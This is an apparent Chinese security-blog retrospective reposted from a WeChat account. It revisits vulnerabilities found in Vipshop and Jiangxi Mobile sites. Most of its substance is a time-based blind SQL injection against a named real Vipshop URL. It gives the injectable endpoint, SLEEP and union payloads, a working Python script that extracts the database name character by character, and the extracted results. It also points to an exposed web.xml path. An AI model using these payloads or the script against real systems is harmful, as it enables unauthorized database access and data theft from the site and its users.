这个1024夜晚不孤单,回顾我们以前挖过的洞~

  • A+
所属分类:安全闲碎

1.唯品会某系统文件下载

这个1024夜晚不孤单,回顾我们以前挖过的洞~
这个1024夜晚不孤单,回顾我们以前挖过的洞~

这个1024夜晚不孤单,回顾我们以前挖过的洞~


2.唯品会某分站SQL注入漏洞

#1 注入点

http://share.vip.com/Acts/SetCount?id=63200

#2 PAYLOAD, 5秒后打开网页

http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP(5)))RING) and 'RING'='RING

#3 基于时间差注入

code 区域
(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING)

#* 另一种注入方式

code 区域
http://share.vip.com/Acts/SetCount?id=63200' and if((1=2),1,(select 1 union select 2))#


漏洞证明:

#4 EXP

code 区域
#!/usr/bin/env python
# encoding: utf-8
# vip_new.py
# [email protected]

import requests
import time
import sys

reload(sys)
sys.setdefaultencoding('utf-8')

payloads = list('[email protected]_.')

for i in range(1,20):
   for _str in payloads:
       start_time = time.time()
       url = "http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING) AND 'RING'='RING"
       result = requests.get(url).text
       if(time.time() - start_time) > 3:
           print _str
           break

#5 注入证明

code 区域
database()
vipshop_share
user()
[email protected]***


3.江西移动网厅信息泄露

这个1024夜晚不孤单,回顾我们以前挖过的洞~

漏洞证明:

http://**.**.**.**/ecare/web.xml

这个1024夜晚不孤单,回顾我们以前挖过的洞~




本文始发于微信公众号(飓风网络安全):这个1024夜晚不孤单,回顾我们以前挖过的洞~

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: